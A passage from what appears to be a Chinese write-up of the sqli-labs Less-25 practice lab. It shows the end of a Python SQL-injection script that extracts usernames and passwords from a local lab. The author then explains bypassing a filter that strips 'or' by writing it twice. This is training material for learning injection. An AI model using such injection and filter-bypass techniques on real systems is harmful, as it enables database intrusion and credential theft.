        logging.exception("第三次注入语句出现错误...")
62
        return response
63
    return username, password
64

65

66
if __name__ == "__main__":
67
    url = "http://127.0.0.1/sql/Less-25/"
68
    symbol = "\'"
69
    rule = "/html/body/div/font[2]/font/text()"
70

71
    print(main(url, symbol, rule))

这个逆天正则匹配，会匹配所有的 or。information 里面有 or，password 里面还有 or，都被删除了……
翻了一下源码发现只删除一次，那还好，可以使用双写绕过。这个 password 不用正则还真想不出自动加一个 or 的方式，但是我又懒了，就手动写一下吧

成功获得数据 1768198056721